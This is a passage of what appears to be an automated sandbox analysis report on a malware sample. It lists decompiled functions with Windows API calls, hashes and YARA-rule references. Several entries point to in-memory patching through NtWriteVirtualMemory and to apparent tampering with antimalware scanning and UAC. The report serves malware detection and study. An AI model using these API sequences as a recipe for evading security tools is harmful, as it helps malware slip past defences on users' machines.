                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: c4c621c3e4b0de812496ca9300d933a0fdb032cb38527023cac3ce1502893fe5
                                                                            • Instruction ID: 17d53f446fbaa202aa8a1ddfc69f20b46dd4c42efbc171f110c48e6fcb55c98d
                                                                            • Opcode Fuzzy Hash: c4c621c3e4b0de812496ca9300d933a0fdb032cb38527023cac3ce1502893fe5
                                                                            • Instruction Fuzzy Hash: 28F0CD2C708108EB8B247B3D8DC46AE279A6F403447585876F44ADB20ADB64DC45CB63
                                                                            Function 02884D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SysFreeString.OLEAUT32(0289F4A4), ref: 02884C6E
                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 02884D5B
                                                                            • SysFreeString.OLEAUT32(00000000), ref: 02884D6D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: String$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 986138563-0
                                                                            • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                            • Instruction ID: 5b64f6d047145535a535fa99628d10a8a584e9caa8db9911ece94a5cf42eb037
                                                                            • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                            • Instruction Fuzzy Hash: CDE0C2BD2012065EFF04BF258C44B37332FAFC1751F248098E904CA014EB38E401AE3A
                                                                            Function 028970DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SysFreeString.OLEAUT32(?), ref: 028973DA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID: H
                                                                            • API String ID: 3341692771-2852464175
                                                                            • Opcode ID: 8859160e275032553d72f5c59d1d66eb7540fb6e38b80618c6615699d5cddd58
                                                                            • Instruction ID: 5e3bc8b97af796ead7fe21a3c2a1d170582975e0681ec45c985315cd4c5ca200
                                                                            • Opcode Fuzzy Hash: 8859160e275032553d72f5c59d1d66eb7540fb6e38b80618c6615699d5cddd58
                                                                            • Instruction Fuzzy Hash: B0B1C2B8A216089FDB15CF99D480A9DFBF2FF89314F588169E849EB364D730A845CF50
                                                                            Function 0288E760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantCopy.OLEAUT32(00000000,00000000), ref: 0288E781
                                                                              • Part of subcall function 0288E364: VariantClear.OLEAUT32(?), ref: 0288E373
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCopy
                                                                            • String ID:
                                                                            • API String ID: 274517740-0
                                                                            • Opcode ID: 8998193ecf74e457fd06eb230fa05c1bff443327be0c38eb40e88f64abf7c51f
                                                                            • Instruction ID: 20391069085e1a5b0aab78c3346cf535118c7593e52aaae23df8771f30fa590f
                                                                            • Opcode Fuzzy Hash: 8998193ecf74e457fd06eb230fa05c1bff443327be0c38eb40e88f64abf7c51f
                                                                            • Instruction Fuzzy Hash: 3F118E2C7102149BDB34BF2DC8C4A6A77DAEF85750B108466F55ECB619EB30DC44CA62
                                                                            Function 0288E3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: InitVariant
                                                                            • String ID:
                                                                            • API String ID: 1927566239-0
                                                                            • Opcode ID: f80b3f8b2d9dac4bbf2bae05c891c8d66a1c449cf597969af1fc5579623f703c
                                                                            • Instruction ID: 1a47a8480dfb15510878aceb7b10f99e87910e88983f40101386de2858b833aa
                                                                            • Opcode Fuzzy Hash: f80b3f8b2d9dac4bbf2bae05c891c8d66a1c449cf597969af1fc5579623f703c
                                                                            • Instruction Fuzzy Hash: D5314C7DA00A09ABDB10FEACD884AAA77E8EB0D314F548465F90DD3250D334E950CBA1
                                                                            Function 028989D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                              • Part of subcall function 02897D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02897DEC
                                                                              • Part of subcall function 02898338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,028983C2), ref: 028983A4
                                                                            • FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0290738C,Function_0000662C,00000004,0290739C,0290738C,05F5E103,00000040,029073A0,74AE0000,00000000,00000000), ref: 02898AAA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                            • String ID:
                                                                            • API String ID: 1478290883-0
                                                                            • Opcode ID: 4e272868a6c78af90353306215629664486d5475de667486db2a847e271fb06b
                                                                            • Instruction ID: c9fe3bdb276cd312d7049b87f763f8615776d15c2ba62027a1779506b4007691
                                                                            • Opcode Fuzzy Hash: 4e272868a6c78af90353306215629664486d5475de667486db2a847e271fb06b
                                                                            • Instruction Fuzzy Hash: 5F2142BD780305AFFB50FBECEC42B9EB79A9B45710F5414A0B504E72D0E674B9108A2A
                                                                            Function 02896D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CLSIDFromProgID.OLE32(00000000,?,00000000,02896DB9,?,?,?,00000000), ref: 02896D99
                                                                              • Part of subcall function 02884C60: SysFreeString.OLEAUT32(0289F4A4), ref: 02884C6E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FreeFromProgString
                                                                            • String ID:
                                                                            • API String ID: 4225568880-0
                                                                            • Opcode ID: 8618ed320ea088f7b47d16febafcee0f0e7d1564c73b73b2d375576e79b6fd17
                                                                            • Instruction ID: c0a1b5c507078d937437ca0b09adacddae278ed81b98e1adfdb369a0ed7c6870
                                                                            • Opcode Fuzzy Hash: 8618ed320ea088f7b47d16febafcee0f0e7d1564c73b73b2d375576e79b6fd17
                                                                            • Instruction Fuzzy Hash: 82E0E53E2002187BE711FB6EDC41D5E77ADDF8A740B5144B1E500D3600F93A7D008861
                                                                            Function 02885868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(02880000,?,00000105), ref: 02885886
                                                                              • Part of subcall function 02885ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02880000,028AE790), ref: 02885AE8
                                                                              • Part of subcall function 02885ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02880000,028AE790), ref: 02885B06
                                                                              • Part of subcall function 02885ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02880000,028AE790), ref: 02885B24
                                                                              • Part of subcall function 02885ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02885B42
                                                                              • Part of subcall function 02885ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02885BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02885B8B
                                                                              • Part of subcall function 02885ACC: RegQueryValueExA.ADVAPI32(?,02885D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02885BD1,?,80000001), ref: 02885BA9
                                                                              • Part of subcall function 02885ACC: RegCloseKey.ADVAPI32(?,02885BD8,00000000,?,?,00000000,02885BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02885BCB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                            • String ID:
                                                                            • API String ID: 2796650324-0
                                                                            • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                            • Instruction ID: 5252dca8d586985b1fc3ee4974d7c83760b9c5b8eb4f52cc747e2c7db419b688
                                                                            • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                            • Instruction Fuzzy Hash: F7E06D79A003148FCB10EE9CC9C0B5737D8AB08750F450961EC58CF246D7B4D9208BD2
                                                                            Function 02887DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02887DF4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                            • Instruction ID: b65c79ccc8a18fe64f458fe71f3911ce798e5b231f999995c12a11e944d1fc81
                                                                            • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                            • Instruction Fuzzy Hash: 58D05BBA3091517AE224B65E5D44EA75BDCDBC6770F10473DF558C7180D7208C01C6B1
                                                                            Function 0289ADB8 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0289AB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0289ADA3,?,?,0289AE35,00000000,0289AF11), ref: 0289AB30
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0289AB48
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0289AB5A
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0289AB6C
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0289AB7E
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0289AB90
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0289ABA2
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 0289ABB4
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0289ABC6
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0289ABD8
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0289ABEA
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0289ABFC
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0289AC0E
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 0289AC20
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0289AC32
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0289AC44
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0289AC56
                                                                            • Process32First.KERNEL32(?,00000128), ref: 0289ADC9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$FirstHandleModuleProcess32
                                                                            • String ID:
                                                                            • API String ID: 2774106396-0
                                                                            • Opcode ID: 457727699e03df20e42a8b202bf57f9d42f96a33bef81b70bd6e2953a39d30be
                                                                            • Instruction ID: 640b0be72fb7a89904f1106197792a4529a53825328cdc6022f9e2f4ee7f2ee1
                                                                            • Opcode Fuzzy Hash: 457727699e03df20e42a8b202bf57f9d42f96a33bef81b70bd6e2953a39d30be
                                                                            • Instruction Fuzzy Hash: D3C08CBA7122201B8F1476FC3CC89D7878ECD4A1B730C08A2F50CE3502E7258C20A2E0
                                                                            Function 0289ADD8 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0289AB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0289ADA3,?,?,0289AE35,00000000,0289AF11), ref: 0289AB30
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0289AB48
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0289AB5A
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0289AB6C
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0289AB7E
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0289AB90
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0289ABA2
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 0289ABB4
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0289ABC6
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0289ABD8
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0289ABEA
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0289ABFC
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0289AC0E
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 0289AC20
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0289AC32
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0289AC44
                                                                              • Part of subcall function 0289AB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0289AC56
                                                                            • Process32Next.KERNEL32(?,00000128), ref: 0289ADE9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModuleNextProcess32
                                                                            • String ID:
                                                                            • API String ID: 2237597116-0
                                                                            • Opcode ID: 9fd3e7badfb49f83001988007db88f5666a3b93a8b80733c3a5f8e1f25d4f4c5
                                                                            • Instruction ID: cc9e7b1498aebffdb9c769b903b30786c68eae011ba8ec9321b5977220372456
                                                                            • Opcode Fuzzy Hash: 9fd3e7badfb49f83001988007db88f5666a3b93a8b80733c3a5f8e1f25d4f4c5
                                                                            • Instruction Fuzzy Hash: 81C08CBA7122301B8E1476FC3CC89E7878DCD4A1B730848A2F508E3102DB258C10A2E0
                                                                            Function 02887E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(00000000,?,028A356F,ScanString,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanBuffer,02907380,028AB7B8,OpenSession,02907380,028AB7B8,Initialize), ref: 02887E8B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                            • Instruction ID: ec9884531c3e3ccda95a820e9017a88abe60369ad0b245e5968ac6c3ed697030
                                                                            • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                            • Instruction Fuzzy Hash: ABC08CFF2112010A1E60F5FC1CC4319428909841357701E61E47CCA2D2E3169C222822
                                                                            Function 02887E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(00000000,?,028A041F,ScanString,02907380,028AB7B8,OpenSession,02907380,028AB7B8,ScanString,02907380,028AB7B8,UacScan,02907380,028AB7B8,UacInitialize), ref: 02887E67
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                            • Instruction ID: ff54af9b85b2af65e55052f2f87a67da4c95a3eebf24ebf9caa91ba30a2419a3
                                                                            • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                            • Instruction Fuzzy Hash: FBC08CAE2012000A5A60F5BC2CC4249528A0D042793740A61A43CC62E2E32298A22812
                                                                            Function 02884C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FreeString
                                                                            • String ID:
                                                                            • API String ID: 3341692771-0
                                                                            • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                            • Instruction ID: e498962e026e30251142ccf76b466b57a35878db71b7319f4a7a9dcb3ee3d2e8
                                                                            • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                            • Instruction Fuzzy Hash: 29C012AF60023157FB21AA9DACC475262CD9B052A5F1400A1D508D7250E7749C0047A1
                                                                            Function 028AC35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • timeSetEvent.WINMM(00002710,00000000,028AC350,00000000,00000001), ref: 028AC36C
                                                                            Memory Dump Source
